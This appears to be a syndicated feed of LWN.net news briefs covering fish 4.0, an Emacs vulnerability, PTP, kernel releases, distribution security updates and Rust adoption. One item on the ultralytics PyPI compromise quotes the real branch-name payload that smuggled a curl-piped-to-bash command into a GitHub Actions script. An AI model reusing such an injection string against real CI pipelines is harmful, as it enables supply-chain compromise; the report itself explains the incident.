Post Syndicated from daroc original https://lwn.net/Articles/1002820/

fish is a shell with a custom language and several affordances not available out of the box in other shells, such as directory-sensitive command completion. Although the project does not normally make beta releases, the

newly announced 4.0 release
will have one in order to ensure that no problems were introduced

after a major effort to switch the code base from C++ to Rust.

fish is a smart and user-friendly command line shell with clever features that just work, without needing an advanced degree in bash scriptology. Today we are announcing an open beta, inviting all users to try out the upcoming 4.0 release.

fish 4.0 is a big upgrade. It’s got lots of new features to make using the command line easier and more enjoyable, such as more natural key binding and expanded history search. And under the hood, we’ve rebuilt the foundation in Rust to embrace modern computing.

Post Syndicated from daroc original https://lwn.net/Articles/1002046/

Emacs has had a
few bugs related to accidentally
permitting the execution of untrusted code. Unfortunately, it seems as though
another bug of that sort has appeared — and may be harder to patch,
because the problem comes from the way Emacs handles expansion of Lisp macros in
code being analyzed. The
vulnerability is only practically exploitable in a non-default configuration, so
not every Emacs user has something to worry about. The Emacs
developers are reportedly working on a fix, but have not yet shared details
about it. In the meantime, every Emacs version since at least
26.1 (released in May 2018) through the current development version is vulnerable.

Post Syndicated from daroc original https://lwn.net/Articles/1000434/

Handling time in a networked environment is never easy. The

Network Time Protocol (NTP) has been used to synchronize clocks across the
internet for almost 40 years — but, as computers and networks get faster, the
degree of synchronization it offers is not sufficient for some use cases. The

Precision Time Protocol (PTP) attempts to provide more precise
time synchronization, at the
expense of requiring dedicated kernel and hardware
support. The Linux kernel has

supported PTP since 2011, but the protocol has recently seen

increasing use in data centers. As PTP becomes more widespread, it may be
useful to have an idea how it compares to NTP.

Post Syndicated from daroc original https://lwn.net/Articles/1002036/

Security updates have been issued by Debian (chromium, pgpool2, and smarty4), Fedora (chromium, linux-firmware, matrix-synapse, open62541, and thunderbird), Red Hat (kernel, kernel-rt, python3.11, python3.12, python3.9:3.9.18, python3.9:3.9.21, and ruby:2.5), SUSE (buildah, chromium, govulncheck-vulndb, java-1_8_0-ibm, libsvn_auth_gnome_keyring-1-0, python310-Django, qemu, and radare2), and Ubuntu (linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke,
linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oem-6.8,
linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,
linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, php7.0, php7.2, python-asyncssh, and smarty3).

Post Syndicated from daroc original https://lwn.net/Articles/1000812/

The LWN.net Weekly Edition for December 12, 2024 is available.

Post Syndicated from daroc original https://lwn.net/Articles/998576/

The Linux kernel has many tunable parameters. While there is much advice
available on the internet about how to set them, few people have the time to
weed through the (often contradictory) explanations and choose appropriate
values. One possible way to address this is

a project called bpftune, a
program that uses BPF to track various metrics about a running system and
adjust the sysctl knobs appropriately. The program is developed by Oracle, and
is available under a GPLv2 license. Bpftune is currently mostly
focused on optimizing network settings, but the authors hope that the system is
flexible enough to be extended to cover other settings.

Post Syndicated from daroc original https://lwn.net/Articles/1001522/

When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts
interviews of the candidates in order to help Fedora contributors make an informed choice. This
year, the candidates are

Zbigniew Jędrzejewski-Szmek,

Tomáš Hrčka,

Josh Stone,

David Cantrell,

Fabio Alessandro Locati, and

Kevin Fenzi.
All of them except for Locati are current members of the steering council.
Voting is open until December 20.

Post Syndicated from daroc original https://lwn.net/Articles/1000635/

In 2019, the Python community had a

lengthy discussion about changing the rules (that some find counterintuitive) on
using break, continue, or return statements in
finally blocks. These are all ways of jumping out of a finally
block, which can interrupt the handling of a raised exception.
At the time, the Python developers chose not to change
things, because the consensus was that the existing behavior was not a problem. Now, after
a
report put together by Irit Katriel, the project is once again considering
changing the language.

Post Syndicated from daroc original https://lwn.net/Articles/1001215/

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account

“OpenIM Robot”
(which appears to be controlled by
Xinwei Xiong) opened
a pull request for the

ultralytics
Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the
pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository’s secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This problem has been
known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.

Post Syndicated from daroc original https://lwn.net/Articles/1001202/

Greg Kroah-Hartman released version
6.12.3 of the kernel to fix

a regression that can cause some machines to fail to boot on version 6.12.2.
The other stable branches are continuing on their normal cadence, with

6.12.4-rc1 and

6.6.64-rc1 starting review today.

Post Syndicated from daroc original https://lwn.net/Articles/1001164/

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Post Syndicated from daroc original https://lwn.net/Articles/997784/

The traditional structure of a compiler forms a pipeline — parsing,
type-checking, optimization, and code-generation, usually in that order. But
modern programming languages have requirements that are ill-suited to such a
design. Increasingly, compilers are moving toward other designs in
order to support incremental compilation and low-latency responses for uses
like integration into IDEs. Rust has, for the last eight years, been pursuing a
particularly unusual design; in that time
compile times have

substantially improved, but there’s still more work to be done.

Post Syndicated from daroc original https://lwn.net/Articles/1000185/

Security updates have been issued by Debian (firefox-esr, redis, twisted, and tzdata), Fedora (firefox, nss, pam, rust-rustls, rust-zlib-rs, thunderbird, tuned, and xen), and SUSE (cobbler, kernel, libjxl-devel, libuv, postgresql12, postgresql14, postgresql15, python-waitress, seamonkey, tomcat, and tomcat10).

Post Syndicated from daroc original https://lwn.net/Articles/1000097/

Earlier today, one of our subscribers, anselm, posted the one millionth item in our database during a discussion in the comments about the GPL. One million articles and comments is a big milestone — one representing twenty two years of work by both the editors of LWN and the community. I think reaching this milestone on Thanksgiving is a lovely coincidental reminder of how far LWN has come, and how that wouldn’t have been possible without your support. So thank you for reading.

Post Syndicated from daroc original https://lwn.net/Articles/998115/

The Linux kernel community’s discussions about including Rust have

gotten a lot of attention, but the kernel is not the only project wrestling
with the question of whether to allow Rust. The Git project

discussed the prospect in January, and then

again at the Git Contributor’s Summit in September. Complicating the
discussion is the Git project’s lack of a policy on platform
support, and the fact that it does already have tools written in other
languages.
While the project has not committed to using
or avoiding Rust, it seems like only a matter of time until maintainers will
have to make a decision.

Post Syndicated from daroc original https://lwn.net/Articles/999107/

The
6.12.1,
6.11.10,
6.6.63, and
6.1.119 stable kernel updates have been released.
As always, they contain important fixes.

Post Syndicated from daroc original https://lwn.net/Articles/999102/

Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar).

Post Syndicated from daroc original https://lwn.net/Articles/998856/

CHICKEN Scheme, a portable Scheme compiler, is gearing up for its next major release. Maintainer Felix Winkelmann has
shared

an article about what changes to expect in version 6 of the language, including better Unicode support and support for the

R7RS (small) Scheme standard.

Every major release is a chance of fixing long-standing problems with the codebase and address bad design decisions. CHICKEN is now nearly 25 years old and we had many major overhauls of the system. Sometimes these caused a lot of pain, but still we always try to improve things and hopefully make it more enjoyable and practical for our users. There are places in the code that are messy, too complex, or that require cleanup or rewrite, always sitting there waiting to be addressed. On the other hand CHICKEN has been relatively stable compared to many other language implementations and has a priceless community of users that help us improving it. Our users never stop reminding us of what could be better, where the shortcomings are, where things are hard to use or inefficient.

Post Syndicated from daroc original https://lwn.net/Articles/998854/

Security updates have been issued by Debian (guix, libmodule-scandeps-perl, needrestart, and thunderbird), SUSE (gh), and Ubuntu (kernel, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,
linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gcp-6.8, linux-gke, linux-hwe-6.8,
linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency,
linux-oem-6.8, linux-oracle, linux-raspi, linux-iot, linux-lowlatency, linux-lowlatency-hwe-6.8, needrestart, python2.7, python3.10, python3.12, python3.8, and Waitress).

Post Syndicated from daroc original https://lwn.net/Articles/998291/

Security updates have been issued by Debian (curl and unbound), Fedora (krb5 and microcode_ctl), Red Hat (kernel and kernel-rt), SUSE (glib2, python3-wxPython, and ucode-intel), and Ubuntu (golang-1.17, golang-1.18, libgd2, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-gke, linux-raspi, linux-raspi, linux-raspi-5.4, and php7.0, php7.2).